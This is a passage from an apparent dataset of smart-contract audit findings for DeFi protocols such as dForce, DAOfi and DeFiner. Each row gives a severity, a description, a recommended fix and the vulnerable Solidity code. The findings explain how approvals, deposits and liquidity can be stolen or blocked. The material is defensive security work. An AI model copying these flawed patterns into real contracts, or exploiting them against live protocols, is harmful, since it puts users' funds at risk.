first time in a given block. Because `_withdrawReserves` does not force an update to these values, it is possible for the withdrawal amount to be calculated using stale values.",Ensure `_withdrawReserves` invokes `iMSD.updateInterest()` and `MSDS.updateInterest()`.,,"```\\nfunction \\_withdrawReserves(address \\_token, uint256 \\_amount)\\n external\\n onlyOwner\\n onlyMSD(\\_token)\\n{\\n (uint256 \\_equity, ) = calcEquity(\\_token);\\n\\n require(\\_equity >= \\_amount, ""Token do not have enough reserve"");\\n\\n // Increase the token debt\\n msdTokenData[\\_token].debt = msdTokenData[\\_token].debt.add(\\_amount);\\n\\n // Directly mint the token to owner\\n MSD(\\_token).mint(owner, \\_amount);\\n```\\n" +permit functions use deployment-time instead of execution-time chain ID,low,"The contracts `Base`, `MSD`, and `MSDS` each have an EIP-2612-style `permit` function that supports approvals with EIP-712 signatures. We focus this discussion on the `Base` contract, but the same applies to `MSD` and `MSDS`.\\nWhen the contract is initialized, the chain ID is queried (with the `CHAINID` opcode) and becomes part of the `DOMAIN_SEPARATOR` — a hash of several values which (presumably) don't change over the lifetime of the contract and that can therefore be computed only once, when the contract is deployed.\\n```\\nfunction \\_initialize(\\n string memory \\_name,\\n string memory \\_symbol,\\n uint8 \\_decimals,\\n IControllerInterface \\_controller,\\n IInterestRateModelInterface \\_interestRateModel\\n) internal virtual {\\n controller = \\_controller;\\n interestRateModel = \\_interestRateModel;\\n accrualBlockNumber = block.number;\\n borrowIndex = BASE;\\n flashloanFeeRatio = 0.0008e18;\\n protocolFeeRatio = 0.25e18;\\n \\_\\_Ownable\\_init();\\n \\_\\_ERC20\\_init(\\_name, \\_symbol, \\_decimals);\\n \\_\\_ReentrancyGuard\\_init();\\n\\n uint256 chainId;\\n\\n assembly {\\n chainId := chainid()\\n }\\n DOMAIN\\_SEPARATOR = keccak256(\\n abi.encode(\\n keccak256(\\n ""EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)""\\n ),\\n keccak256(bytes(\\_name)),\\n keccak256(bytes(""1"")),\\n chainId,\\n address(this)\\n )\\n );\\n}\\n```\\n\\nThe `DOMAIN_SEPARATOR` is supposed to prevent replay attacks by providing context for the signature; it is hashed into the digest to be signed.\\n```\\nbytes32 \\_digest =\\n keccak256(\\n abi.encodePacked(\\n ""\\x19\\x01"",\\n DOMAIN\\_SEPARATOR,\\n keccak256(\\n abi.encode(\\n PERMIT\\_TYPEHASH,\\n \\_owner,\\n \\_spender,\\n \\_value,\\n \\_currentNonce,\\n \\_deadline\\n )\\n )\\n )\\n );\\naddress \\_recoveredAddress = ecrecover(\\_digest, \\_v, \\_r, \\_s);\\nrequire(\\n \\_recoveredAddress != address(0) && \\_recoveredAddress == \\_owner,\\n ""permit: INVALID\\_SIGNATURE!""\\n);\\n```\\n\\nThe chain ID is not necessarily constant, though. In the event of a chain split, only one of the resulting chains gets to keep the original chain ID and the other will have to use a new one. With the current pattern, a signature will be valid on both chains; if the `DOMAIN_SEPARATOR` is recomputed for every verification, a signature will only be valid on the chain that keeps the original ID — which is probably the intended behavior.\\nRemark\\nThe reason why the not necessarily constant chain ID is part of the supposedly constant `DOMAIN_SEPARATOR` is that EIP-712 predates the introduction of the `CHAINID` opcode. Originally, it was not possible to query the chain ID via opcode, so it had to be supplied to the constructor of a contract by the deployment script.","An obvious fix is to compute the `DOMAIN_SEPARATOR` dynamically in `permit`. However, since a chain split is a relatively unlikely event, it makes sense to compute the `DOMAIN_SEPARATOR` at deployment/initialization time and then check in `permit` whether the current chain ID equals the one that went into the `DOMAIN_SEPARATOR`. If that is true, we proceed as before. If the chain ID has changed, we could (1) just revert, or (2) recompute the `DOMAIN_SEPARATOR` with the new chain ID. Solution (1) is probably the easiest and most straightforward to implement, but it should be noted that it makes the `permit` functionality of this contract completely unusable on the new chain.",,"```\\nfunction \\_initialize(\\n string memory \\_name,\\n string memory \\_symbol,\\n uint8 \\_decimals,\\n IControllerInterface \\_controller,\\n IInterestRateModelInterface \\_interestRateModel\\n) internal virtual {\\n controller = \\_controller;\\n interestRateModel = \\_interestRateModel;\\n accrualBlockNumber = block.number;\\n borrowIndex = BASE;\\n flashloanFeeRatio = 0.0008e18;\\n protocolFeeRatio = 0.25e18;\\n \\_\\_Ownable\\_init();\\n \\_\\_ERC20\\_init(\\_name, \\_symbol, \\_decimals);\\n \\_\\_ReentrancyGuard\\_init();\\n\\n uint256 chainId;\\n\\n assembly {\\n chainId := chainid()\\n }\\n DOMAIN\\_SEPARATOR = keccak256(\\n abi.encode(\\n keccak256(\\n ""EIP712Domain(string name,string version,uint256 chainId,address verifyingContract)""\\n ),\\n keccak256(bytes(\\_name)),\\n keccak256(bytes(""1"")),\\n chainId,\\n address(this)\\n )\\n );\\n}\\n```\\n" +iETH.receive() does not support contracts executing during their constructor,low,"`iETH.receive()` requires that the caller is a contract:\\n```\\n/\\*\\*\\n \\* @notice receive ETH, used for flashloan repay.\\n \\*/\\nreceive() external payable {\\n require(\\n msg.sender.isContract(),\\n ""receive: Only can call from a contract!""\\n );\\n}\\n```\\n\\nThis method uses the `extcodesize` of an account to check that the account belongs to a contract. However, contracts currently executing their constructor will have an `extcodesize` of 0, and will not be able to use this method.\\nThis is unlikely to cause significant issues, but dForce may want to consider supporting this edge case.",Use `msg.sender != tx.origin` as a more reliable method to detect use by a contract.,,"```\\n/\\*\\*\\n \\* @notice receive ETH, used for flashloan repay.\\n \\*/\\nreceive() external payable {\\n require(\\n msg.sender.isContract(),\\n ""receive: Only can call from a contract!""\\n );\\n}\\n```\\n" +Token approvals can be stolen in DAOfiV1Router01.addLiquidity(),high,"`DAOfiV1Router01.addLiquidity()` creates the desired pair contract if it does not already exist, then transfers tokens into the pair and calls `DAOfiV1Pair.deposit()`. There is no validation of the address to transfer tokens from, so an attacker could pass in any address with nonzero token approvals to `DAOfiV1Router`. This could be used to add liquidity to a pair contract for which the attacker is the `pairOwner`, allowing the stolen funds to be retrieved using `DAOfiV1Pair.withdraw()`.\\n```\\nfunction addLiquidity(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint256 amountBase) {\\n if (IDAOfiV1Factory(factory).getPair(\\n lp.tokenBase,\\n lp.tokenQuote,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n ) == address(0)) {\\n IDAOfiV1Factory(factory).createPair(\\n address(this),\\n lp.tokenBase,\\n lp.tokenQuote,\\n msg.sender,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n );\\n }\\n address pair = DAOfiV1Library.pairFor(\\n factory, lp.tokenBase, lp.tokenQuote, lp.slopeNumerator, lp.n, lp.fee\\n );\\n\\n TransferHelper.safeTransferFrom(lp.tokenBase, lp.sender, pair, lp.amountBase);\\n TransferHelper.safeTransferFrom(lp.tokenQuote, lp.sender, pair, lp.amountQuote);\\n amountBase = IDAOfiV1Pair(pair).deposit(lp.to);\\n}\\n```\\n",Transfer tokens from `msg.sender` instead of `lp.sender`.,,"```\\nfunction addLiquidity(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint256 amountBase) {\\n if (IDAOfiV1Factory(factory).getPair(\\n lp.tokenBase,\\n lp.tokenQuote,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n ) == address(0)) {\\n IDAOfiV1Factory(factory).createPair(\\n address(this),\\n lp.tokenBase,\\n lp.tokenQuote,\\n msg.sender,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n );\\n }\\n address pair = DAOfiV1Library.pairFor(\\n factory, lp.tokenBase, lp.tokenQuote, lp.slopeNumerator, lp.n, lp.fee\\n );\\n\\n TransferHelper.safeTransferFrom(lp.tokenBase, lp.sender, pair, lp.amountBase);\\n TransferHelper.safeTransferFrom(lp.tokenQuote, lp.sender, pair, lp.amountQuote);\\n amountBase = IDAOfiV1Pair(pair).deposit(lp.to);\\n}\\n```\\n" +The deposit of a new pair can be stolen,high,"To create a new pair, a user is expected to call the same `addLiquidity()` (or the addLiquidityETH()) function of the router contract seen above:\\n```\\nfunction addLiquidity(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint256 amountBase) {\\n if (IDAOfiV1Factory(factory).getPair(\\n lp.tokenBase,\\n lp.tokenQuote,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n ) == address(0)) {\\n IDAOfiV1Factory(factory).createPair(\\n address(this),\\n lp.tokenBase,\\n lp.tokenQuote,\\n msg.sender,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n );\\n }\\n address pair = DAOfiV1Library.pairFor(\\n factory, lp.tokenBase, lp.tokenQuote, lp.slopeNumerator, lp.n, lp.fee\\n );\\n\\n TransferHelper.safeTransferFrom(lp.tokenBase, lp.sender, pair, lp.amountBase);\\n TransferHelper.safeTransferFrom(lp.tokenQuote, lp.sender, pair, lp.amountQuote);\\n amountBase = IDAOfiV1Pair(pair).deposit(lp.to);\\n}\\n```\\n\\nThis function checks if the pair already exists and creates a new one if it does not. After that, the first and only deposit is made to that pair.\\nThe attacker can front-run that call and create a pair with the same parameters (thus, with the same address) by calling the `createPair` function of the `DAOfiV1Factory` contract. By calling that function directly, the attacker does not have to make the deposit when creating a new pair. The initial user will make this deposit, whose funds can now be withdrawn by the attacker.","There are a few factors/bugs that allowed this attack. All or some of them should be fixed:\\nThe `createPair` function of the `DAOfiV1Factory` contract can be called directly by anyone without depositing with any `router` address as the parameter. The solution could be to allow only the `router` to create a pair.\\nThe `addLiquidity` function checks that the pair does not exist yet. If the pair exists already, a deposit should only be made by the owner of the pair. But in general, a new pair shouldn't be deployed without depositing in the same transaction.\\nThe pair's address does not depend on the owner/creator. It might make sense to add that information to the salt.",,"```\\nfunction addLiquidity(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint256 amountBase) {\\n if (IDAOfiV1Factory(factory).getPair(\\n lp.tokenBase,\\n lp.tokenQuote,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n ) == address(0)) {\\n IDAOfiV1Factory(factory).createPair(\\n address(this),\\n lp.tokenBase,\\n lp.tokenQuote,\\n msg.sender,\\n lp.slopeNumerator,\\n lp.n,\\n lp.fee\\n );\\n }\\n address pair = DAOfiV1Library.pairFor(\\n factory, lp.tokenBase, lp.tokenQuote, lp.slopeNumerator, lp.n, lp.fee\\n );\\n\\n TransferHelper.safeTransferFrom(lp.tokenBase, lp.sender, pair, lp.amountBase);\\n TransferHelper.safeTransferFrom(lp.tokenQuote, lp.sender, pair, lp.amountQuote);\\n amountBase = IDAOfiV1Pair(pair).deposit(lp.to);\\n}\\n```\\n" +Incorrect token decimal conversions can lead to loss of funds,high,"The `_convert()` function in `DAOfiV1Pair` is used to accommodate tokens with varying `decimals()` values. There are three cases in which it implicitly returns 0 for any `amount`, the most notable of which is when `token.decimals() == resolution`.\\nAs a result of this, `getQuoteOut()` reverts any time either `baseToken` or `quoteToken` have `decimals == INTERNAL_DECIMALS` (currently hardcoded to 8).\\n`getBaseOut()` also reverts in most cases when either `baseToken` or `quoteToken` have `decimals() == INTERNAL_DECIMALS`. The exception is when `getBaseOut()` is called while `supply` is 0, as is the case in `deposit()`. This causes `getBaseOut()` to succeed, returning an incorrect value.\\nThe result of this is that no swaps can be performed in one of these pools, and the `deposit()` function will return an incorrect `amountBaseOut` of `baseToken` to the depositor, the balance of which can then be withdrawn by the `pairOwner`.\\n```\\nfunction \\_convert(address token, uint256 amount, uint8 resolution, bool to) private view returns (uint256 converted) {\\n uint8 decimals = IERC20(token).decimals();\\n uint256 diff = 0;\\n uint256 factor = 0;\\n converted = 0;\\n if (decimals > resolution) {\\n diff = uint256(decimals.sub(resolution));\\n factor = 10 \\*\\* diff;\\n if (to && amount >= factor) {\\n converted = amount.div(factor);\\n } else if (!to) {\\n converted = amount.mul(factor);\\n }\\n } else if (decimals < resolution) {\\n diff = uint256(resolution.sub(decimals));\\n factor = 10 \\*\\* diff;\\n if (to) {\\n converted = amount.mul(factor);\\n } else if (!to && amount >= factor) {\\n converted = amount.div(factor);\\n }\\n }\\n}\\n```\\n","The `_convert()` function should return `amount` when `token.decimals() == resolution`. Additionally, implicit return values should be avoided whenever possible, especially in functions that implement complex mathematical operations.\\n`BancorFormula.power(baseN, baseD, _, _)` does not support `baseN < baseD`, and checks should be added to ensure that any call to the `BancorFormula` conforms to the expected input ranges.",,"```\\nfunction \\_convert(address token, uint256 amount, uint8 resolution, bool to) private view returns (uint256 converted) {\\n uint8 decimals = IERC20(token).decimals();\\n uint256 diff = 0;\\n uint256 factor = 0;\\n converted = 0;\\n if (decimals > resolution) {\\n diff = uint256(decimals.sub(resolution));\\n factor = 10 \\*\\* diff;\\n if (to && amount >= factor) {\\n converted = amount.div(factor);\\n } else if (!to) {\\n converted = amount.mul(factor);\\n }\\n } else if (decimals < resolution) {\\n diff = uint256(resolution.sub(decimals));\\n factor = 10 \\*\\* diff;\\n if (to) {\\n converted = amount.mul(factor);\\n } else if (!to && amount >= factor) {\\n converted = amount.div(factor);\\n }\\n }\\n}\\n```\\n" +The swapExactTokensForETH checks the wrong return value,high,"The following lines are intended to check that the amount of tokens received from a swap is greater than the minimum amount expected from this swap (sp.amountOut):\\n```\\nuint amountOut = IWETH10(WETH).balanceOf(address(this));\\nrequire(\\n IWETH10(sp.tokenOut).balanceOf(address(this)).sub(balanceBefore) >= sp.amountOut,\\n 'DAOfiV1Router: INSUFFICIENT\\_OUTPUT\\_AMOUNT'\\n);\\n```\\n\\nInstead, it calculates the difference between the initial receiver's balance and the balance of the router.",Check the intended value.,,"```\\nuint amountOut = IWETH10(WETH).balanceOf(address(this));\\nrequire(\\n IWETH10(sp.tokenOut).balanceOf(address(this)).sub(balanceBefore) >= sp.amountOut,\\n 'DAOfiV1Router: INSUFFICIENT\\_OUTPUT\\_AMOUNT'\\n);\\n```\\n" +"DAOfiV1Pair.deposit() accepts deposits of zero, blocking the pool",medium,"`DAOfiV1Pair.deposit()` is used to deposit liquidity into the pool. Only a single deposit can be made, so no liquidity can ever be added to a pool where `deposited == true`. The `deposit()` function does not check for a nonzero deposit amount in either token, so a malicious user that does not hold any of the `baseToken` or `quoteToken` can lock the pool by calling `deposit()` without first transferring any funds to the pool.\\n```\\nfunction deposit(address to) external override lock returns (uint256 amountBaseOut) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_DEPOSIT');\\n require(deposited == false, 'DAOfiV1: DOUBLE\\_DEPOSIT');\\n reserveBase = IERC20(baseToken).balanceOf(address(this));\\n reserveQuote = IERC20(quoteToken).balanceOf(address(this));\\n // this function is locked and the contract can not reset reserves\\n deposited = true;\\n if (reserveQuote > 0) {\\n // set initial supply from reserveQuote\\n supply = amountBaseOut = getBaseOut(reserveQuote);\\n if (amountBaseOut > 0) {\\n \\_safeTransfer(baseToken, to, amountBaseOut);\\n reserveBase = reserveBase.sub(amountBaseOut);\\n }\\n }\\n emit Deposit(msg.sender, reserveBase, reserveQuote, amountBaseOut, to);\\n}\\n```\\n","Require a minimum deposit amount in both `baseToken` and `quoteToken`, and do not rely on any assumptions about the distribution of `baseToken` as part of the security model.",,"```\\nfunction deposit(address to) external override lock returns (uint256 amountBaseOut) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_DEPOSIT');\\n require(deposited == false, 'DAOfiV1: DOUBLE\\_DEPOSIT');\\n reserveBase = IERC20(baseToken).balanceOf(address(this));\\n reserveQuote = IERC20(quoteToken).balanceOf(address(this));\\n // this function is locked and the contract can not reset reserves\\n deposited = true;\\n if (reserveQuote > 0) {\\n // set initial supply from reserveQuote\\n supply = amountBaseOut = getBaseOut(reserveQuote);\\n if (amountBaseOut > 0) {\\n \\_safeTransfer(baseToken, to, amountBaseOut);\\n reserveBase = reserveBase.sub(amountBaseOut);\\n }\\n }\\n emit Deposit(msg.sender, reserveBase, reserveQuote, amountBaseOut, to);\\n}\\n```\\n" +Restricting DAOfiV1Pair functions to calls from router makes DAOfiV1Router01 security critical,medium,"The `DAOfiV1Pair` functions `deposit()`, `withdraw()`, and `swap()` are all restricted to calls from the router in order to avoid losses from user error. However, this means that any unidentified issue in the Router could render all pair contracts unusable, potentially locking the pair owner's funds.\\nAdditionally, `DAOfiV1Factory.createPair()` allows any nonzero address to be provided as the `router`, so pairs can be initialized with a malicious `router` that users would be forced to interact with to utilize the pair contract.\\n```\\nfunction deposit(address to) external override lock returns (uint256 amountBaseOut) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_DEPOSIT');\\n```\\n\\n```\\nfunction withdraw(address to) external override lock returns (uint256 amountBase, uint256 amountQuote) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_WITHDRAW');\\n```\\n\\n```\\nfunction swap(address tokenIn, address tokenOut, uint256 amountIn, uint256 amountOut, address to) external override lock {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_SWAP');\\n```\\n","Do not restrict `DAOfiV1Pair` functions to calls from `router`, but encourage users to use a trusted `router` to avoid losses from user error. If this restriction is kept, consider including the `router` address in the deployment salt for the pair or hardcoding the address of a trusted `router` in `DAOfiV1Factory` instead of taking the `router` as a parameter to `createPair()`.",,"```\\nfunction deposit(address to) external override lock returns (uint256 amountBaseOut) {\\n require(msg.sender == router, 'DAOfiV1: FORBIDDEN\\_DEPOSIT');\\n```\\n" +Pair contracts can be easily blocked,low,"The parameters used to define a unique pair are the `baseToken`, `quoteToken`, `slopeNumerator`, `n`, and `fee`. There is only one accepted value for `n`, and there are eleven accepted values for `fee`. This makes the number of possible “interesting” pools for each token pair somewhat limited, and pools can be easily blocked by front-running deployments and depositing zero liquidity or immediately withdrawing deposited liquidity. Because liquidity can only be added once, these pools are permanently blocked.\\nThe existing mitigation for this issue is to create a new pool with slightly different parameters. This creates significant cost for the creator of a pair, forces them to deploy a pair with sub-optimal parameters, and could potentially block all interesting pools for a token pair.\\nThe salt used to determine unique pair contracts in DAOfiV1Factory.createPair():\\n```\\nrequire(getPair(baseToken, quoteToken, slopeNumerator, n, fee) == address(0), 'DAOfiV1: PAIR\\_EXISTS'); // single check is sufficient\\nbytes memory bytecode = type(DAOfiV1Pair).creationCode;\\nbytes32 salt = keccak256(abi.encodePacked(baseToken, quoteToken, slopeNumerator, n, fee));\\nassembly {\\n pair := create2(0, add(bytecode, 32), mload(bytecode), salt)\\n}\\nIDAOfiV1Pair(pair).initialize(router, baseToken, quoteToken, pairOwner, slopeNumerator, n, fee);\\npairs[salt] = pair;\\n```\\n","Consider adding additional parameters to the salt that defines a unique pair, such as the `pairOwner`. Modifying the parameters included in the salt can also be used to partially mitigate other security concerns raised in this report.",,"```\\nrequire(getPair(baseToken, quoteToken, slopeNumerator, n, fee) == address(0), 'DAOfiV1: PAIR\\_EXISTS'); // single check is sufficient\\nbytes memory bytecode = type(DAOfiV1Pair).creationCode;\\nbytes32 salt = keccak256(abi.encodePacked(baseToken, quoteToken, slopeNumerator, n, fee));\\nassembly {\\n pair := create2(0, add(bytecode, 32), mload(bytecode), salt)\\n}\\nIDAOfiV1Pair(pair).initialize(router, baseToken, quoteToken, pairOwner, slopeNumerator, n, fee);\\npairs[salt] = pair;\\n```\\n" +DAOfiV1Router01.removeLiquidityETH() does not support tokens with no return value,low,"While the rest of the system uses the `safeTransfer*` pattern, allowing tokens that do not return a boolean value on `transfer()` or `transferFrom()`, `DAOfiV1Router01.removeLiquidityETH()` throws and consumes all remaining gas if the base token does not return `true`.\\nNote that the deposit in this case can still be withdrawn without unwrapping the Eth using `removeLiquidity()`.\\n```\\nfunction removeLiquidityETH(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint amountToken, uint amountETH) {\\n IDAOfiV1Pair pair = IDAOfiV1Pair(DAOfiV1Library.pairFor(factory, lp.tokenBase, WETH, lp.slopeNumerator, lp.n, lp.fee));\\n require(msg.sender == pair.pairOwner(), 'DAOfiV1Router: FORBIDDEN');\\n (amountToken, amountETH) = pair.withdraw(address(this));\\n assert(IERC20(lp.tokenBase).transfer(lp.to, amountToken));\\n IWETH10(WETH).withdraw(amountETH);\\n TransferHelper.safeTransferETH(lp.to, amountETH);\\n}\\n```\\n","Be consistent with the use of `safeTransfer*`, and do not use `assert()` in cases where the condition can be false.",,"```\\nfunction removeLiquidityETH(\\n LiquidityParams calldata lp,\\n uint deadline\\n) external override ensure(deadline) returns (uint amountToken, uint amountETH) {\\n IDAOfiV1Pair pair = IDAOfiV1Pair(DAOfiV1Library.pairFor(factory, lp.tokenBase, WETH, lp.slopeNumerator, lp.n, lp.fee));\\n require(msg.sender == pair.pairOwner(), 'DAOfiV1Router: FORBIDDEN');\\n (amountToken, amountETH) = pair.withdraw(address(this));\\n assert(IERC20(lp.tokenBase).transfer(lp.to, amountToken));\\n IWETH10(WETH).withdraw(amountETH);\\n TransferHelper.safeTransferETH(lp.to, amountETH);\\n}\\n```\\n" +Users can withdraw their funds immediately when they are over-leveraged,high,"`Accounts.withdraw` makes two checks before processing a withdrawal.\\nFirst, the method checks that the amount requested for withdrawal is not larger than the user's balance for the asset in question:\\n```\\nfunction withdraw(address \\_accountAddr, address \\_token, uint256 \\_amount) external onlyAuthorized returns(uint256) {\\n\\n // Check if withdraw amount is less than user's balance\\n require(\\_amount <= getDepositBalanceCurrent(\\_token, \\_accountAddr), ""Insufficient balance."");\\n uint256 borrowLTV = globalConfig.tokenInfoRegistry().getBorrowLTV(\\_token);\\n```\\n\\nSecond, the method checks that the withdrawal will not over-leverage the user. The amount to be withdrawn is subtracted from the user's current “borrow power” at the current price. If the user's total value borrowed exceeds this new borrow power, the method fails, as the user no longer has sufficient collateral to support their borrow positions. However, this `require` is only checked if a user is not already over-leveraged:\\n```\\n// This if condition is to deal with the withdraw of collateral token in liquidation.\\n// As the amount if borrowed asset is already large than the borrow power, we don't\\n// have to check the condition here.\\nif(getBorrowETH(\\_accountAddr) <= getBorrowPower(\\_accountAddr))\\n require(\\n getBorrowETH(\\_accountAddr) <= getBorrowPower(\\_accountAddr).sub(\\n \\_amount.mul(globalConfig.tokenInfoRegistry().priceFromAddress(\\_token))\\n .mul(borrowLTV).div(Utils.getDivisor(address(globalConfig), \\_token)).div(100)\\n ), ""Insufficient collateral when withdraw."");\\n```\\n\\nIf the user has already borrowed more than their “borrow power” allows, they are allowed to withdraw regardless. This case may arise in several circumstances; the most common being price fluctuation.","Disallow withdrawals if the user is already over-leveraged.\\nFrom the comment included in the code sample above, this condition is included to support the `liquidate` method, but its inclusion creates an attack vector that may allow users to withdraw when they should not be able to do so. Consider adding an additional method to support `liquidate`, so that users may not exit without repaying debts.",,"```\\nfunction withdraw(address \\_accountAddr, address \\_token, uint256 \\_amount) external onlyAuthorized returns(uint256) {\\n\\n // Check if withdraw amount is less than user's balance\\n require(\\_amount <= getDepositBalanceCurrent(\\_token, \\_accountAddr), ""Insufficient balance."");\\n uint256 borrowLTV = globalConfig.tokenInfoRegistry().getBorrowLTV(\\_token);\\n```\\n" +"Users can borrow funds, deposit them, then borrow more Won't Fix",high,"Users may deposit and borrow funds denominated in any asset supported by the `TokenRegistry`. Each time a user deposits or borrows a token, they earn FIN according to the difference in deposit / borrow rate indices maintained by `Bank`.\\nBorrowing funds\\nWhen users borrow funds, they may only borrow up to a certain amount: the user's “borrow power.” As long as the user is not requesting to borrow an amount that would cause their resulting borrowed asset value to exceed their available borrow power, the borrow is successful and the user receives the assets immediately. A user's borrow power is calculated in the following function:\\n```\\n/\\*\\*\\n \\* Calculate an account's borrow power based on token's LTV\\n \\*/\\nfunction getBorrowPower(address \\_borrower) public view returns (uint256 power) {\\n for(uint8 i = 0; i < globalConfig.tokenInfoRegistry().getCoinLength(); i++) {\\n if (isUserHasDeposits(\\_borrower, i)) {\\n address token = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(token != ETH\\_ADDR) {\\n divisor = 10\\*\\*uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(token));\\n }\\n // globalConfig.bank().newRateIndexCheckpoint(token);\\n power = power.add(getDepositBalanceCurrent(token, \\_borrower)\\n .mul(globalConfig.tokenInfoRegistry().priceFromIndex(i))\\n .mul(globalConfig.tokenInfoRegistry().getBorrowLTV(token)).div(100)\\n .div(divisor)\\n );\\n }\\n }\\n return power;\\n}\\n```\\n\\nFor each asset, borrow power is calculated from the user's deposit size, multiplied by the current chainlink price, multiplied and that asset's “borrow LTV.”\\nDepositing borrowed funds\\nAfter a user borrows tokens, they can then deposit those tokens, increasing their deposit balance for that asset. As a result, their borrow power increases, which allows the user to borrow again.\\nBy continuing to borrow, deposit, and borrow again, the user can repeatedly borrow assets. Essentially, this creates positions for the user where the collateral for their massive borrow position is entirely made up of borrowed assets.\\nConclusion\\nThere are several potential side-effects of this behavior.\\nFirst, as described in https://github.com/ConsenSys/definer-audit-2021-02/issues/3, the system is comprised of many different tokens, each of which is subject to price fluctuation. By borrowing and depositing repeatedly, a user may establish positions across all supported tokens. At this point, if price fluctuations cause the user's account to cross the liquidation threshold, their positions can be liquidated.\\nLiquidation is a complicated function of the protocol, but in essence, the liquidator purchases a target's collateral at a discount, and the resulting sale balances the account somewhat. However, when a user repeatedly deposits borrowed tokens, their collateral is made up of borrowed tokens: the system's liquidity! As a result, this may allow an attacker to intentionally create a massively over-leveraged account on purpose, liquidate it, and exit with a chunk of the system liquidity.\\nAnother potential problem with this behavior is FIN token mining. When users borrow and deposit, they earn FIN according to the size of the deposit / borrow, and the difference in deposit / borrow rate indices since the last deposit / borrow. By repeatedly depositing / borrowing, users are able to artificially deposit and borrow far more often than normal, which may allow them to generate FIN tokens at will. This additional strategy may make attacks like the one described above much more economically feasible.","Due to the limited time available during this engagement, these possibilities and potential mitigations were not fully explored. Definer is encouraged to investigate this behavior more carefully.",,"```\\n/\\*\\*\\n \\* Calculate an account's borrow power based on token's LTV\\n \\*/\\nfunction getBorrowPower(address \\_borrower) public view returns (uint256 power) {\\n for(uint8 i = 0; i < globalConfig.tokenInfoRegistry().getCoinLength(); i++) {\\n if (isUserHasDeposits(\\_borrower, i)) {\\n address token = globalConfig.tokenInfoRegistry().addressFromIndex(i);\\n uint divisor = INT\\_UNIT;\\n if(token != ETH\\_ADDR) {\\n divisor = 10\\*\\*uint256(globalConfig.tokenInfoRegistry().getTokenDecimals(token));\\n }\\n // globalConfig.bank().newRateIndexCheckpoint(token);\\n power = power.add(getDepositBalanceCurrent(token, \\_borrower)\\n .mul(globalConfig.tokenInfoRegistry().priceFromIndex(i))\\n .mul(globalConfig.tokenInfoRegistry().getBorrowLTV(token)).div(100)\\n .div(divisor)\\n );\\n }\\n }\\n return power;\\n}\\n```\\n" +Stale Oracle prices might affect the rates,high,"It's possible that due to network congestion or other reasons, the price that the ChainLink oracle returns is old and not up to date. This is more extreme in lesser known tokens that have fewer ChainLink Price feeds to update the price frequently. The codebase as is, relies on `chainLink().getLatestAnswer()` and does not check the timestamp of the price.\\n```\\n function priceFromAddress(address tokenAddress) public view returns(uint256) {\\n if(Utils.\\_isETH(address(globalConfig), tokenAddress)) {\\n return 1e18;\\n }\\n return uint256(globalConfig.chainLink().getLatestAnswer(tokenAddress));\\n }\\n```\\n","Do a sanity check on the price returned from the oracle. If the price is older than a threshold, revert or handle in other means.",,"```\\n function priceFromAddress(address tokenAddress) public view returns(uint256) {\\n if(Utils.\\_isETH(address(globalConfig), tokenAddress)) {\\n return 1e18;\\n }\\n return uint256(globalConfig.chainLink().getLatestAnswer(tokenAddress));\\n }\\n```\\n" +Overcomplicated unit conversions,medium,"There are many instances of unit conversion in the system that are implemented in a confusing way. This could result in mistakes in the conversion and possibly failure in correct accounting. It's been seen in the ecosystem that these type of complicated unit conversions could result in calculation mistake and loss of funds.\\nHere are a few examples:\\n```\\n function getBorrowRatePerBlock(address \\_token) public view returns(uint) {\\n if(!globalConfig.tokenInfoRegistry().isSupportedOnCompound(\\_token))\\n // If the token is NOT supported by the third party, borrowing rate = 3% + U \\* 15%.\\n return getCapitalUtilizationRatio(\\_token).mul(globalConfig.rateCurveSlope()).div(INT\\_UNIT).add(globalConfig.rateCurveConstant()).div(BLOCKS\\_PER\\_YEAR);\\n\\n // if the token is suppored in third party, borrowing rate = Compound Supply Rate \\* 0.4 + Compound Borrow Rate \\* 0.6\\n return (compoundPool[\\_token].depositRatePerBlock).mul(globalConfig.compoundSupplyRateWeights()).\\n add((compoundPool[\\_token].borrowRatePerBlock).mul(globalConfig.compoundBorrowRateWeights())).div(10);\\n }\\n```\\n\\n```\\n compoundPool[\\_token].depositRatePerBlock = cTokenExchangeRate.mul(UNIT).div(lastCTokenExchangeRate[cToken])\\n .sub(UNIT).div(blockNumber.sub(lastCheckpoint[\\_token]));\\n```\\n\\n```\\n return lastDepositeRateIndex.mul(getBlockNumber().sub(lcp).mul(depositRatePerBlock).add(INT\\_UNIT)).div(INT\\_UNIT);\\n```\\n",Simplify the unit conversions in the system. This can be done either by using a function wrapper for units to convert all values to the same unit before including them in any calculation or by better documenting every line of unit conversion,,"```\\n function getBorrowRatePerBlock(address \\_token) public view returns(uint) {\\n if(!globalConfig.tokenInfoRegistry().isSupportedOnCompound(\\_token))\\n // If the token is NOT supported by the third party, borrowing rate = 3% + U \\* 15%.\\n return getCapitalUtilizationRatio(\\_token).mul(globalConfig.rateCurveSlope()).div(INT\\_UNIT).add(globalConfig.rateCurveConstant()).div(BLOCKS\\_PER\\_YEAR);\\n\\n // if the token is suppored in third party, borrowing rate = Compound Supply Rate \\* 0.4 + Compound Borrow Rate \\* 0.6\\n return (compoundPool[\\_token].depositRatePerBlock).mul(globalConfig.compoundSupplyRateWeights()).\\n 